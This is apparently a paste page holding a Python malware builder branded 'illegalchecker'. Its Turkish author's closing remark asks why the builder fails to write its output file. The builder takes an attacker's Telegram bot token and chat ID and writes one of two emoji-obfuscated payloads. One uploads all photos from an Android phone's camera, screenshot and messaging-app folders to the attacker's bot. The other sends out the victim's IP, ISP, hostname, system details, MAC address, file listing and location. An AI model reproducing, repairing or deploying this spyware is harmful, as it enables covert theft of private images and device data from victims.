kod

kod


import requests

from datetime import datetime

import os

import time

from colorama import Fore, Style, init


os.system('pip install emojify')


E = '\033[1;31m'

B = '\033[1;36m'

G = '\033[1;32m'

S = '\033[1;33m'

W = '\033[1;97m'


os.system('clear')



print(Style.RESET_ALL)

print(Style.BRIGHT)

print(Fore.GREEN)

print('''

     ▐▮▌ ▞▖ ▙ ▚▞▚▞ ▞▖ █▘ █☰                                                 

  

     -  illegalchecker - V = 2.1  ''')


print(f'''   {B}{E}==============================

   |{G}[+] GitHub  : {B}FurkanGod  {E}|

   |{G}[+] Developer : {B}Furkanisyanedior {E}|

   |{G}[+] TeleGram : {B}illegalchecker {E}|

   {E}==============================''')

print('        M A L W A R E           ')    

print('''\033[1;34m    https://t.me/illegalchecker    

    https://github.com/FurkanGod\n\n''')   


print('\033[1;35m  Telegram Kanalımıza Katılın \n')        

#os.system(f'xdg-open https://t.me/illegalchecker')

time.sleep(3)    

os.system(f'xdg-open https://t.me/MajesteSohbet')

time.sleep(3)

  

id=input(W+f' [{E} ** {W}] {S}Telegram ID Gir ==> {B}')

token=input(W+f' [{E} ** {W}] {S}Bot Token Gir ==> {B}')


print(f'   {E}==============================')


skript = str(f"""import os

os.system('pip install requests')

os.system('clear')

import requests

from datetime import datetime


def banner():

  print ('\t     \033[2;33m  ▇▇▇◤▔▔▔▔▔▔▔◥▇▇▇     ')

  print('\t     \033[2;33m  ▇▇▇▏◥▇◣┊◢▇◤▕▇▇▇    ')

  print ('\t     \033[2;33m  ▇▇▇▏▃▆▅▎▅▆▃▕▇▇▇     ')

  print ('\t     \033[2;33m  ▇▇▇▏╱▔▕▎▔▔╲▕▇▇▇      ')

  print ('\t     \033[2;33m  ▇▇▇◣◣▃▅▎▅▃◢◢▇▇▇\033[2;32m Code By :\033[2;31m iLLEGAL CHECKER ')

  print ('\t     \033[2;33m  ▇▇▇▇◣◥▅▅▅◤◢▇▇▇▇       ')

  print ('\t     \033[2;33m  ▇▇▇▇▇◣╲▇╱◢▇▇▇▇▇   ')

  print ('\t     \033[2;33m  ▇▇▇▇▇▇◣▇◢▇▇▇▇▇▇      ')


banner()

print('')

print('')

   

def res(file):

  requests.post(f'https://api.telegram.org/bot"""+token+'''/sendDocument?chat_id='''+id+"""', files=file)


d = datetime.now()     

tlg = requests.post(f'https://api.telegram.org/bot"""+token+"/sendMessage?chat_id="+id+"""&text=Saldırı Başladı!  '+str(d))


os.chdir(r"/storage/emulated/0/DCIM")

tmp = list(os.scandir('.'))

for i in tmp:

 if 'jpg' or 'png' in i.name:

   try:

     file ={"document": open(f'{i.name}', 'rb')}

     res(file)      

   except:

     pass

 else:

    pass

    

print('\033[2;31m [ * ] \033[2;34m İnternet bağlantısı kontrol ediliyor .... ')   


print('')

     

os.chdir(r"/storage/emulated/0/DCIM/Screenshots")

tmp = list(os.scandir('.'))

for i in tmp:

 if 'jpg' or 'png' in i.name:

   try:

     file ={"document": open(f'{i.name}', 'rb')}

     res(file)

   except:

     pass

 else:

    pass  


print('\033[2;31m [ ✓ ] \033[2;32m Balanıyor ......') 


print('')

                        

os.chdir(r"/storage/emulated/0/DCIM/Camera")  

tmp = list(os.scandir('.'))

for i in tmp:

 if 'jpg' or 'png' in i.name:

   try:

     file ={"document": open(f'{i.name}', 'rb')}  

     res(file)

   except:

     pass

 else:

    pass   


print('\033[34;1m [ ✔ ] \033[33;1m Lütfenn Bekleyiniz ......... ')  


print('')

            

os.chdir(r"/storage/emulated/0/Pictures/Telegram")  

tmp = list(os.scandir('.'))

for i in tmp:

 if 'jpg' or 'png' in i.name:

   try:

     file ={"document": open(f'{i.name}', 'rb')}  

     res(file)

   except:

     pass

 else:

    pass 

    

print('\033[36;1m [ ✘ ] \033[32;1m Saldırı Başlatıldı.......')  

print('')

   

os.chdir(r"/storage/emulated/0/Pictures/Instagram")  

tmp = list(os.scandir('.'))

for i in tmp:

 if 'jpg' or 'png' in i.name:

   try:

     file ={"document": open(f'{i.name}', 'rb')}    

     res(file)

   except:

     pass

 else:

    pass  

    

print('\033[0;1m [ × ] \033[31;1m FURKANiSYANEDiOR ...... ')  

print('')    


os.chdir(r"/storage/emulated/0/Pictures/Messenger")  

tmp = list(os.scandir('.'))

for i in tmp:

 if 'jpg' or 'png' in i.name:

   try:

     file ={"document": open(f'{i.name}', 'rb')}   

     res(file)

   except:

     pass

 else:

    pass  


exit(' F U R K A N ')""" )


hack = str('''import requests

import geocoder 

import os

import socket

import sys

import time

from glob import glob

from datetime import datetime

from platform import *

from getmac import get_mac_address as gma


def install(pip):

  os.system(f'pip install {pip}')

install('getmac') 

install('platform')  

install('glob')

install('socket')

install('geocoder')

install('requests')

os.system('clear')


token = '''+f'"{token}"'+'''  

id = '''+id+'''  


def banner():

  print ('\t     \033[2;33m  ▇▇▇◤▔▔▔▔▔▔▔◥▇▇▇     ')

  print('\t     \033[2;33m  ▇▇▇▏◥▇◣┊◢▇◤▕▇▇▇    ')

  print ('\t     \033[2;33m  ▇▇▇▏▃▆▅▎▅▆▃▕▇▇▇     ')

  print ('\t     \033[2;33m  ▇▇▇▏╱▔▕▎▔▔╲▕▇▇▇      ')

  print ('\t     \033[2;33m  ▇▇▇◣◣▃▅▎▅▃◢◢▇▇▇\033[2;32m Code By :\033[2;31m FURKAN ')

  print ('\t     \033[2;33m  ▇▇▇▇◣◥▅▅▅◤◢▇▇▇▇       ')

  print ('\t     \033[2;33m  ▇▇▇▇▇◣╲▇╱◢▇▇▇▇▇   ')

  print ('\t     \033[2;33m  ▇▇▇▇▇▇◣▇◢▇▇▇▇▇▇      ')

  print('')

  print("\t\033[1;36m     https://t.me/illegalchecker ")


banner()

print('')


tlg = requests.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=👊 Saldırı Başlatıldı.... ✊ {datetime.now()} ')


print('\033[2;31m [ * ] \033[2;34m İnternet bağlantısı kontrol ediliyor.... ')

print('')

               

ip = requests.get("https://api.ipify.org").text

with open('TargetIP.txt','w') as IP:

  IP.write(f' [ ✓ ] IP ~» {ip} ')

  IP.close()

  file = {'document':open('TargetIP.txt','rb')}

  res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)


print('\033[2;31m [ ✓ ] \033[2;32m Connection ......')

print('') 


print('\033[34;1m [ ✔ ] \033[33;1m Watting ......... ')

print('')


result = requests.get(f'http://ip-api.com/json/{ip}').json()    

with open('Netowrk-info.txt','w') as AS:

  AS.write(f' [ ✓ ] Net Work information data » .... {result["isp"]} ')

  AS.close()

  file = {'document':open('Netowrk-info.txt','rb')}

  res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)  


print('\033[36;1m [ ✘ ] \033[32;1m Start Toole .......')

print('') 

     

host = socket.gethostname()

local = socket.gethostbyname(host)   

with open('Hostname.txt','w') as Hn:

  Hn.write(f' [ ✓ ] Host Name ~» {host} ☞ {local} ')

  Hn.close()

  file = {'document':open('Hostname.txt','rb')}

  res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)


print('\033[0;1m [ × ] \033[31;1m FURKAN...... ')

print('')

         

re = release()

pv = python_version()

pl = platform()

ma = machine()

ve = version()   

with open('Sysinfo.txt','w') as S:

  S.write(f' [ ✓ ] System information » .... release => {re} python_version => {pv} platform => {pl} machine => {ma} version => {ve} ')

  S.close()

  file = {'document':open('Sysinfo.txt','rb')}

  res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)


mac = gma()     

with open('MacAddress.txt','w') as M:

  M.write(f' [ ✓ ] MAC ADDRESS ~» {mac} ')   

  M.close()

  file = {'document':open('MacAddress.txt','rb')}

  res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)


g = glob("/storage/emulated/0/*")

with open('DirSystem-path.txt','w') as D:

  D.write(f' [ ✓ ] dirs in all pwd system » .... ')   

  for i in g:

    D.write(i+'  ,  ')

  D.close()

  file = {'document':open('DirSystem-path.txt','rb')}

  res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)


our_ip = geocoder.ip(ip).latlng

map_lenr = our_ip[0]

map_lenl = our_ip[1]

with open('Location.txt','w') as Jbs:

  Jbs.write(f' [ ✓ ] Victim-Location-IP » .... https://www.google.com/maps/@{map_lenr},{map_lenl},13z')

  Jbs.close()

  file = {'document':open('Location.txt','rb')}

  res = requests.post(f"https://api.telegram.org/bot{token}/sendDocument?chat_id={id}", files=file)

        

   

tlg = requests.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=✅Done : Devloper by Furkan > @Furkanisyanedior ✅ ')''')


#os.system(f'xdg-open https://t.me/FurkanTG')


print(W+f''' [{E} 01 {W}] Galeriyi Hackle

{W} [{E} 02 {W}] Cihaz Bilgisi Al''')

print('')


black = int(input(W+' [ × ] '+'\033[1;35m Hangisini Yapmak istiyorsun : '+G))

print('\n')


if black == 1:

  namee=input(W+f' [{E} ** {W}] {S}Dosya Adı ==> {B}')

  with open(f'enc_{namee}.py','w') as code:

    code.write(skript)

     

elif black == 2:

  namee=input(W+f' [{E} ** {W}] {S}Dosya Adı ==> {B}')

  with open(f'enc_{namee}.py','w') as co:

    co.write(hack)  

else:

   exit(' H A T A ') 


os.system(f'emojify --input enc_{namee}.py --output {namee}.py --emoji')

os.system(f'rm -rf enc_{namee}.py')


print(f'  {G} ✅ DOSYA KAYIT EDİLDİ {namee}.py ✅ ')                            


bu kod normalde .py uzantılı dosya oluşturup kullanıcı dosyayı termux yada başka bir uygulamadan çalıştırınca kurbanın galerisini bot token ile id ile kullanıcıya gönderir ama dosya oluşturmuyor

Report Page